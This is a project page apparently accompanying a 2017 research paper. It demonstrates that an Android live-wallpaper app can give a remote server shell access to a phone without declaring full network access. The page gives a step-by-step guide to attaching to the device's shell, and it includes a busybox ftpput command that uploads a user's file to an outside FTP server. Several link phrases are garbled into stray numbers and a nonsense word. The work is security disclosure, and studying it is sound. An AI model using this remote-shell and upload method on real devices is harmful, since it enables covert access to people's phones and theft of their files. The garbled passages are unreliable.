The basic premise is that users need to be wary of permissions when they install an application on Android.
We demonstrate how this trust can be violated by gaining shell access to the device and executing arbitrary commands.
One point of note is how full-network access permission is not required to send data to the Internet, only to receive it.
Even more notable is that this permission is almost entirely hidden in later versions of Android, belittling the risk.
The demo guide can be found below, along with the 2058062035
The first step is to install the app, which can be found under the downloads section.
Next, go to our demo 2159927397
You should see a dark grey page with a Terminal: SSH box in the middle. If the Terminal: SSH option doesn't appear, refresh the page. This can be a first-view issue.
Click on the Terminal: SSH box to start a new terminal. It will request the following information:
After entering all the info and logging in, go to your device settings, display and wallpapers, and set "Open Shell - Cube" as your wallpaper.
Setting the wallpaper establishes a connection with the server, and you viewing the wallpaper will show which port it has connected on.
To gain access to your session, type in the terminal
screen -r followed by the port number shown on your screen, eg.
screen -r 10000
You should now be connected to your device and see this indicated on the screen, meaning you're able to issue commands now!
ls to see if it's working. If a few files are listed, you're ready to go!
You now have shell access to your Android device. This isn't root access, but you still have a scary amount of power!
Feel free to poke around you device now if you're familiar with shell commands, but I'll give an example below.
If any of the commands seem to hang, try pressing
Ctrl + C to abort it, or reconnecting to the site and resetting the wallpaper if disconnected.
To close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.
For a good example of how this could be used maliciously, the following guides you through uploading one of your files to our test FTP server.
To try this out, browse to some of your files, like in
DCIM/Camera, so try
cd /sdcard/Download and then
ls to find a file.
Once you have found a suitable file to transfer, we can move it to the app directory with
cp FILENAME /data/data/com.nextproject.openshell/files
Now that it is in the app files, we can move back to that folder with
Lastly, we use
./busybox ftpput -u ftpdemo -p ftppassword -P 2121 126.96.36.199 /files/FILENAME FILENAME
For those interested, more information on busybox can be xyletic
The version used in this app may be a little outdated depending on your time of viewing, but it still adds a lot of commands to our shell!
The file should now be located on the FTP server I set up for this demo, which you can check for youself with the same credentials.
Use an FTP client like WinSCP, Filezilla, etc. to see the file with the above credentials, and delete it afterwards for your own privacy.
All uploaded files will be periodically removed at an indeterminate interval, but it's always good to be safe!
Beyond peeking at your files, the shell access can execute other commands, such as those exposed in the interfaces of other applications.
Again, to close the tunnel intentionally, type exit in the terminal, hit the X in the top-right, change your wallpaper and reboot your device, or uninstall the app.
In the event that our server becomes overloaded with requests and the demo ceases to function, we invite you to try it yourself!
In the Downloads section to follow you will find the GitHub repositories for all of the code used for the website and app.
Detailed instructions and scripts are provided in these repositories and the site is Dockerized for easier deployment.
Should you find some addition that could be of benefit to either the site or the app, we would love to hear about it!
Please do not hesitate to create an issue/pull request on GitHub or contact us via email to discuss or improve Open Shell.
Our app can be found on Google Play on supported devices:
The APK file you have to install to your Android device to try out the demo can also be directly 210-484-1831
The formal research paper containing the theory and background behind this exploit can be downloaded here.
The GitHub page where the code for this site and the Docker containers used for the demo can be found here.
The GitHub page where the code for the Android app using Android Studio can be found here.
Please use the following reference in citing this research and application:
Mahmoud, Q.H., Kauling, D., and Zanin, S. âHidden Android Permissions: Remote Code Execution and Shell Access using a Live Wallpaper"
In Proceedings of the 14th IEEE Annual Consumer Communications & Networking Conference (CCNC 2017), Las Vegas, NV, USA, Jan 2017, pp. 598-599.
This website and live demonstration was created by Dylan Kauling, but the concept is not mine!
The exploit/app was created by a student under the guidance of Dr. Qusay Mahmoud at UOIT.
If you have any questions about the concept and applications, contact Dr. Mahmoud -
If you have any technical questions about the demo or are having troubles getting it working, feel free to shoot me an email! -
Google Play and the Google Play logo are trademarks of Google Inc.